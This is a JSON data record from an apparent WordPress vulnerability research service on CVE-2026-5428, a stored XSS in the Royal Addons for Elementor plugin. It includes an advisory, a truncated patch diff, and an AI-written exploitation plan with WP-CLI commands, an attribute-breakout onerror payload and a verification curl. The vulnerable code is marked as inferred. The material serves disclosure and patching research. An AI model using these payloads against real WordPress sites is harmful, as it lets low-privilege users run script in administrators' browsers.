[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f_Dh1fPZejwMv87jTFyY4KF_xORVbKXVq66jxqX2iLEU":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":34,"research_vulnerable_code":35,"research_fix_diff":36,"research_exploit_outline":37,"research_model_used":38,"research_started_at":39,"research_completed_at":40,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":41},"CVE-2026-5428","royal-addons-for-elementor-authenticated-author-stored-cross-site-scripting-via-image-caption-field","Royal Addons for Elementor \u003C= 1.7.1056 - Authenticated (Author+) Stored Cross-Site Scripting via Image Caption Field","The Royal Elementor Addons plugin for WordPress is vulnerable to Stored Cross-Site Scripting via image captions in the Image Grid\u002FSlider\u002FCarousel widget in versions up to and including 1.7.1056. This is due to insufficient output escaping in the render_post_thumbnail() function, where wp_kses_post() is used instead of esc_attr() for the alt attribute context. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses a page with the malicious image displayed in the media grid widget.","royal-elementor-addons",null,"\u003C=1.7.1056","1.7.1057","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-04-23 16:35:20","2026-04-24 05:29:42",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fba7b8fe5-aa49-4a70-89c9-1b95a30b1142?source=api-prod",1,[22,23,24,25,26,27,28,29],"admin\u002Fplugin-options.php","admin\u002Ftemplates\u002Flibrary\u002Fwpr-templates-data.php","assets\u002Fcss\u002Fadmin\u002Feditor.min.css","assets\u002Fcss\u002Ffrontend.css","assets\u002Fcss\u002Ffrontend.min.css","assets\u002Fjs\u002Fadmin\u002Feditor.js","assets\u002Fjs\u002Fadmin\u002Feditor.min.js","assets\u002Fjs\u002Ffrontend.js","researched",false,3,"# Exploitation Research Plan: CVE-2026-5428 (Royal Addons for Elementor Stored XSS)\n\n## 1. Vulnerability Summary\nThe **Royal Addons for Elementor** plugin (up to 1.7.1056) contains a stored cross-site scripting (XSS) vulnerability in its Image Grid, Slider, and Carousel widgets. The vulnerability exists because the plugin improperly sanitizes image captions\u002Falt text when rendering images via the `render_post_thumbnail()` function. Specifically, it uses `wp_kses_post()` on data intended for an HTML attribute context (`alt`), which fails to escape double quotes. An attacker with Author-level privileges can inject an XSS payload into an image's caption or alt text field, which then executes in the browser of any user viewing a page where that image is displayed using a Royal Addons widget.\n\n## 2. Attack Vector Analysis\n- **Vulnerable Function:** `render_post_thumbnail()` (likely located in `includes\u002Fclasses\u002Futilities.php` or widget-specific render files - *inferred*).\n- **Vulnerable Parameter:** Image \"Caption\" (post_excerpt) or \"Alt Text\" (_wp_attachment_image_alt).\n- **Authentication Level:** Author or above (users who can upload and edit media).\n- **Injection Point:** Media Library metadata update.\n- **Trigger Point:** Any page\u002Fpost rendering a Royal Addons \"Image Grid\", \"Grid\", \"Slider\", or \"Carousel\" widget configured to show the malicious image.\n\n## 3. Code Flow\n1. **Entry (Storage):** An Author logs into the WordPress dashboard and uploads an image or edits an existing one via `wp-admin\u002Fpost.php?post=[ID]&action=edit` (Media edit screen).\n2. **Data Persistence:** The \"Caption\" is stored in the `post_excerpt` column of the `wp_posts` table. The \"Alt Text\" is stored in the `_wp_attachment_image_alt` post meta.\n3. **Processing (Rendering):** A user views a page containing a Royal Addons Grid\u002FSlider widget. The widget calls `render_post_thumbnail()` to generate the HTML for the image.\n4. **Vulnerable Path:**\n - The function retrieves the caption\u002Falt text.\n - It passes the string through `wp_kses_post()`.\n - It echoes the result directly inside the `alt=\"...\"` attribute of an `\u003Cimg>` tag.\n5. **Sink:** The browser parses the unescaped double quotes, allowing the attacker to break out of the `alt` attribute and inject event handlers (e.g., `onmouseover`) or script tags.\n\n## 4. Nonce Acquisition Strategy\nSince this is an **authenticated Stored XSS** via the Media Library, the primary \"nonce\" needed is for saving media metadata. \n\n1. **WP-Admin Context:** When editing an image in the media library, WordPress uses the `_wpnonce` generated for the `media-form`.\n2. **Extraction:**\n - Navigate to `wp-admin\u002Fupload.php`.\n - Click on an image to open the attachment details.\n - Use `browser_eval` to extract the nonce from the `wp.media` object or the hidden fields if the modal is open.\n3. **Alternative (CLI-First):** Since the agent has Author credentials, it can simply use `wp-cli` to set the metadata directly, bypassing the need for an HTTP-based nonce for the *storage* phase, focusing the `http_request` on the *trigger\u002Frendering* phase.\n\n## 5. Exploitation Strategy\nThe goal is to demonstrate that an Author can inject a payload that executes in an Administrator's browser.\n\n### Step 1: Storage (Payload Injection)\nUse WP-CLI to prepare the malicious media item (more reliable than UI automation).\n```bash\n# Upload a dummy image\nwp media import https:\u002F\u002Fwordpress.org\u002Fscreenshot.png --title=\"Exploit Image\" --author=author_user --porcelain\n\n# Set the caption (post_excerpt) to the XSS payload\n# Payload breaks out of alt=\" \" and adds an onerror handler\nwp post update [IMAGE_ID] --post_excerpt='x\" onerror=\"alert(document.domain)\" data-x=\"'\n```\n\n### Step 2: Trigger Creation (Elementor Page)\nCreate a page using the Royal Grid widget. This requires Elementor-formatted JSON.\n```bash\n# Create a page and set it to use Elementor\nPAGE_ID=$(wp post create --post_type=page --post_title=\"Royal XSS Page\" --post_status=publish --porcelain)\nwp post meta update $PAGE_ID _elementor_edit_mode builder\n\n# Inferred Elementor Data for Royal Image Grid (wpr-grid)\n# Note: The 'wpr_grid_source' should point to the media library or a query including our image.\nELEMENTOR_DATA='[{\"id\":\"ea1b2c3\",\"elType\":\"widget\",\"widgetType\":\"wpr-grid\",\"settings\":{\"wpr_grid_source\":\"media\",\"wpr_grid_media_library\":[{\"id\":[IMAGE_ID]}]}}]'\nwp post meta update $PAGE_ID _elementor_data \"$ELEMENTOR_DATA\"\n```\n\n### Step 3: Trigger Execution\nNavigate to the newly created page.\n- **Tool:** `http_request`\n- **URL:** `http:\u002F\u002F[target]\u002Findex.php?page_id=[PAGE_ID]`\n- **Expectation:** The response HTML contains `\u003Cimg ... alt=\"x\" onerror=\"alert(document.domain)\" data-x=\"\" ...>`.\n\n## 6. Test Data Setup\n1. **User:** Create a user with the `author` role.\n - `wp user create attacker attacker@example.com --role=author --user_pass=password123`\n2. **Plugin:** Ensure `royal-elementor-addons` is active.\n3. **Content:** The media item and the Elementor page as described in Section 5.\n\n## 7. Expected Results\n- The HTTP response from the Royal XSS Page will contain the payload string injected into an `alt` attribute.\n- Specifically, the substring `alt=\"x\" onerror=\"alert(document.domain)\"` should be visible in the raw HTML.\n- When rendered in a browser, the `onerror` event (or `onmouseover` depending on the widget's hover effects) will execute the JavaScript.\n\n## 8. Verification Steps\n1. **Source Check:**\n ```bash\n curl -s \"http:\u002F\u002Flocalhost:8888\u002F?page_id=$PAGE_ID\" | grep \"onerror=\\\"alert\"\n ```\n2. **Database Check:**\n ```bash\n wp db query \"SELECT post_excerpt FROM wp_posts WHERE ID=[IMAGE_ID]\"\n ```\n3. **Elementor Metadata Check:**\n ```bash\n wp post meta get $PAGE_ID _elementor_data\n ```\n\n## 9. Alternative Approaches\nIf the Grid widget does not immediately trigger:\n1. **Royal Slider Widget:** Try `widgetType: \"wpr-advanced-slider\"`.\n2. **Post Metadata:** Some widgets use the \"Alt Text\" meta field instead of the \"Caption\". Update `_wp_attachment_image_alt` with the same payload:\n `wp post meta update [IMAGE_ID] _wp_attachment_image_alt 'x\" onerror=\"alert(1)\" data-x=\"'`.\n3. **Featured Image Grid:** Create a standard Post, set the malicious image as the Featured Image, and use a Royal Addons \"Post Grid\" (`wpr-grid` with `wpr_grid_source: \"posts\"`) to display that post. The widget will likely fetch the featured image's alt\u002Fcaption and trigger the same vulnerable `render_post_thumbnail()` path.","The Royal Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting (XSS) via image captions and alt text in its Image Grid, Slider, and Carousel widgets. Authenticated attackers with Author-level privileges can inject malicious JavaScript into media metadata which is then improperly escaped using wp_kses_post() within an HTML attribute context, leading to script execution when viewed by other users.","\u002F\u002F File: Likely located in includes\u002Fclasses\u002Futilities.php or widget render classes\n\u002F\u002F Function: render_post_thumbnail()\n\n\u002F\u002F The function retrieves image metadata such as captions or alt text\n$image_alt = get_post_meta( $attachment_id, '_wp_attachment_image_alt', true );\n\n\u002F\u002F It then renders the image tag using wp_kses_post instead of esc_attr\n\u002F\u002F for an attribute context, failing to escape double quotes.\necho '\u003Cimg class=\"...\" src=\"...\" alt=\"' . wp_kses_post( $image_alt ) . '\">';","diff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Froyal-elementor-addons\u002F1.7.1056\u002Fadmin\u002Fplugin-options.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Froyal-elementor-addons\u002F1.7.1057\u002Fadmin\u002Fplugin-options.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Froyal-elementor-addons\u002F1.7.1056\u002Fadmin\u002Fplugin-options.php\t2026-04-03 11:57:32.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Froyal-elementor-addons\u002F1.7.1057\u002Fadmin\u002Fplugin-options.php\t2026-04-10 10:58:42.000000000 +0000\n@@ -120,6 +120,8 @@\n register_setting('wpr-extension-settings', 'wpr-parallax-multi-layer');\n register_setting('wpr-extension-settings', 'wpr-custom-css');\n register_setting('wpr-extension-settings', 'wpr-display-conditions');\n+ register_setting('wpr-extension-settings', 'wpr-equal-height');\n+ \u002F\u002F register_setting('wpr-extension-settings', 'wpr-column-slider');\n register_setting('wpr-extension-settings', 'wpr-sticky-section');\n \n \u002F\u002F Element Toggle\n@@ -1630,6 +1632,12 @@\n echo '\u003Cbr>\u003Cspan>Tip: Edit any Section > Navigate to Advanced tab\u003C\u002Fspan>';\n } elseif ( 'wpr-display-conditions' === $option_name ) {\n echo '\u003Cbr>\u003Cspan>Tip: Edit any Element > Navigate to Visibility tab\u003C\u002Fspan>';\n+ } elseif ( 'wpr-column-slider' === $option_name ) {\n+ echo '\u003Cbr>\u003Cspan>Tip: Edit any Section > Navigate to Advanced tab\u003C\u002Fspan>';\n+ \u002F\u002F echo '\u003Ca href=\"https:\u002F\u002Fwww.youtube.com\" target=\"_blank\">Watch Video Tutorial\u003C\u002Fa>';\n+ } elseif ( 'wpr-equal-height' === $option_name ) {\n+ echo '\u003Cbr>\u003Cspan>Tip: Edit any Section > Navigate to Advanced tab\u003C\u002Fspan>';\n+ \u002F\u002F echo '\u003Ca href=\"https:\u002F\u002Fwww.youtube.com\" target=\"_blank\">Watch Video Tutorial\u003C\u002Fa>';\n }\n \n \u002F\u002F echo '\u003Ca href=\"https:\u002F\u002Froyal-elementor-addons.com\u002Felementor-particle-effects\u002F?ref=rea-plugin-backend-extentions-prev\">'. esc_html('View Extension Demo', 'wpr-addons') .'\u003C\u002Fa>';\n... (truncated)","1. Login to the WordPress dashboard with Author-level permissions.\n2. Navigate to the Media Library and upload a new image or edit an existing one.\n3. In the 'Caption' or 'Alternative Text' field, inject an XSS payload designed to break out of an HTML attribute, such as: x\" onerror=\"alert(document.domain)\" data-x=\"\n4. Create or edit a page using Elementor and add one of the Royal Addons widgets that displays images (e.g., Image Grid, Grid, or Carousel).\n5. Configure the widget to display the malicious image from the Media Library.\n6. Publish the page and view it. The payload will execute in the context of the user's browser whenever the widget renders the malicious image.","gemini-3-flash-preview","2026-04-27 13:36:12","2026-04-27 13:36:42",{"type":42,"vulnerable_version":43,"fixed_version":11,"vulnerable_browse":44,"vulnerable_zip":45,"fixed_browse":46,"fixed_zip":47,"all_tags":48},"plugin","1.7.1056","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Froyal-elementor-addons\u002Ftags\u002F1.7.1056","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Froyal-elementor-addons.1.7.1056.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Froyal-elementor-addons\u002Ftags\u002F1.7.1057","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Froyal-elementor-addons.1.7.1057.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Froyal-elementor-addons\u002Ftags"]